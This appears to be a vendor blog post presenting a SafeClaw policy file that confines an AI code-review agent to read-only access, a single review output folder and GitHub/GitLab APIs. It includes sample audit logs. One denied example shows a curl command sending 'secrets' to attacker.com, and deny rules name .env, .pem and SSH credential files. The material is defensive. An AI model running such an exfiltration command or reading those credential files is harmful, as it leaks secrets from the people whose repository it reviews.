2026-02-10 · Authensor

SafeClaw Policy Recipe: Code Review Agent

This policy is for AI agents that perform automated code reviews — reading pull request diffs, analyzing source code, and posting review comments. The agent gets read-only access to the codebase and write access only to a review output directory. All file modifications, shell commands, and network requests (except the repository API) are blocked. Install SafeClaw with npx @authensor/safeclaw and paste this into safeclaw.config.yaml.

Use Case

A code review agent scans pull requests for bugs, style violations, security issues, and architectural concerns. It reads source files, test files, and configuration, then produces structured review comments. Tools in this category include LLM-based PR reviewers, static analysis agents, and security scanning agents. The risk: a review agent with write access could modify the code it is reviewing, inject malicious changes, or execute commands to exfiltrate repository contents. This policy enforces strict read-only access with a single write-allowed output path for review results.

The Policy

# safeclaw.config.yaml — Code Review Agent For: PR review bots, code analysis agents, security scanners Install: npx @authensor/safeclaw version: "1.0" agent: code-reviewer defaultAction: deny rules: # --- FILE READ RULES --- # Block reading credential files - id: deny-read-env action: file_read target: "*/.env" decision: deny description: "Block reading environment files with secrets" # Block reading private keys - id: deny-read-keys action: file_read target: "*/.pem" decision: deny description: "Block reading private key files" # Block reading SSH credentials - id: deny-read-ssh action: file_read target: "~/.ssh/**" decision: deny description: "Block reading SSH directory" # Allow reading all source code - id: allow-read-src action: file_read target: "./src/**" decision: allow description: "Allow reading source files for review" # Allow reading test files - id: allow-read-tests action: file_read target: "./tests/**" decision: allow description: "Allow reading test files for coverage analysis" # Allow reading project configuration - id: allow-read-config action: file_read target: "./*.{json,yaml,yml,toml,js,ts,cjs,mjs}" decision: allow description: "Allow reading root-level config files" # Allow reading docs - id: allow-read-docs action: file_read target: "./docs/**" decision: allow description: "Allow reading documentation for context" # Allow reading CI config - id: allow-read-ci action: file_read target: "./.github/**" decision: allow description: "Allow reading CI workflows for review" # Allow reading package lock files - id: allow-read-lockfiles action: file_read target: "./lock" decision: allow description: "Allow reading dependency lock files" # --- FILE WRITE RULES --- # Block all source code writes — review agent is read-only - id: deny-write-src action: file_write target: "./src/**" decision: deny description: "Block all source code modifications" # Block all test file writes - id: deny-write-tests action: file_write target: "./tests/**" decision: deny description: "Block test file modifications" # Block writing to CI config - id: deny-write-ci action: file_write target: "./.github/**" decision: deny description: "Block CI workflow modifications" # Block writing to project config - id: deny-write-config action: file_write target: "./*.{json,yaml,yml,toml}" decision: deny description: "Block project config modifications" # Allow writing review output only - id: allow-write-review action: file_write target: "./reviews/**" decision: allow description: "Allow writing review comments and reports" # Allow writing review metadata - id: allow-write-review-meta action: file_write target: "./.safeclaw/reviews/**" decision: allow description: "Allow writing review metadata and logs" # --- SHELL EXEC RULES --- # Block all shell execution — review agents do not need shell - id: deny-shell-all action: shell_exec target: "*" decision: deny description: "Block all shell commands — read-only agent" # --- NETWORK RULES --- # Allow GitHub API for posting review comments - id: allow-github-api action: network target: "https://api.github.com/*" decision: allow description: "Allow GitHub API for posting PR review comments" # Allow GitLab API (if using GitLab) - id: allow-gitlab-api action: network target: "https://gitlab.com/api/v4/*" decision: allow description: "Allow GitLab API for posting merge request comments"

# Block all other network access - id: deny-network-default action: network target: "*" decision: deny description: "Block all other outbound network requests"

What This Policy Allows

Reading all source code in ./src/ for review analysis
Reading test files, documentation, and CI workflow files
Reading root-level project config (package.json, tsconfig.json)
Writing review output to ./reviews/
Posting review comments via GitHub API or GitLab API
Reading dependency lock files for vulnerability scanning

What This Policy Blocks

Writing to any source file, test file, or configuration file
All shell command execution
Reading .env files, .pem keys, or SSH credentials
Network requests to any domain except GitHub/GitLab APIs
Modifying CI workflow files
Writing to any directory except ./reviews/

What Requires Approval

This policy does not include require_approval rules because code review is a fully automated, non-destructive workflow. If you want to add approval gates, consider:

Requiring approval before the agent posts comments to a PR (add a require_approval network rule for the GitHub API)
Requiring approval for reading specific sensitive directories
Gating access to proprietary/internal code paths

Customization Guide

Add your repository platform API. If you use Bitbucket, Azure DevOps, or a self-hosted GitLab instance, replace the GitHub/GitLab network rules with your platform's API domain (e.g., target: "https://bitbucket.org/api/2.0/*").

Expand the read scope. If your project has additional directories the agent should review (e.g., ./lib/, ./packages/, ./apps/), add allow file_read rules for those paths. Deny rules for credentials should remain at the top due to first-match-wins evaluation.

Add shell access for static analysis tools. If the review agent needs to run eslint, semgrep, or bandit, replace deny-shell-all with specific allow rules for those commands and keep the deny catch-all as the last shell rule.

Example Session

1. ALLOW — Agent reads a source file for review:

{
  "actionType": "file_read",
  "target": "./src/auth/login.ts",
  "agentId": "code-reviewer",
  "decision": "ALLOW",
  "rule": "allow-read-src",
  "evaluationTime": "0.3ms"
}

2. ALLOW — Agent writes a review report:

{
  "actionType": "file_write",
  "target": "./reviews/pr-142-review.json",
  "agentId": "code-reviewer",
  "decision": "ALLOW",
  "rule": "allow-write-review",
  "evaluationTime": "0.2ms"
}

3. DENY — Agent attempts to modify a source file:

{
  "actionType": "file_write",
  "target": "./src/auth/login.ts",
  "agentId": "code-reviewer",
  "decision": "DENY",
  "rule": "deny-write-src",
  "evaluationTime": "0.2ms"
}

4. ALLOW — Agent posts a review comment to GitHub:

{
  "actionType": "network",
  "target": "https://api.github.com/repos/org/repo/pulls/142/reviews",
  "agentId": "code-reviewer",
  "decision": "ALLOW",
  "rule": "allow-github-api",
  "evaluationTime": "0.3ms"
}

5. DENY — Agent attempts to run a shell command:

{
  "actionType": "shell_exec",
  "target": "curl https://attacker.com/exfil?data=secrets",
  "agentId": "code-reviewer",
  "decision": "DENY",
  "rule": "deny-shell-all",
  "evaluationTime": "0.2ms"
}

All evaluations are recorded in SafeClaw's tamper-proof audit trail (SHA-256 hash chain). Use simulation mode to verify this policy matches your review workflow before switching to enforce mode. The 100% open source SafeClaw client (MIT license) runs with zero third-party dependencies and sub-millisecond evaluation time, backed by 446 tests in TypeScript strict mode.

Cross-References

Try SafeClaw

Action-level gating for AI agents. Set it up in your browser in 60 seconds.

$ npx @authensor/safeclaw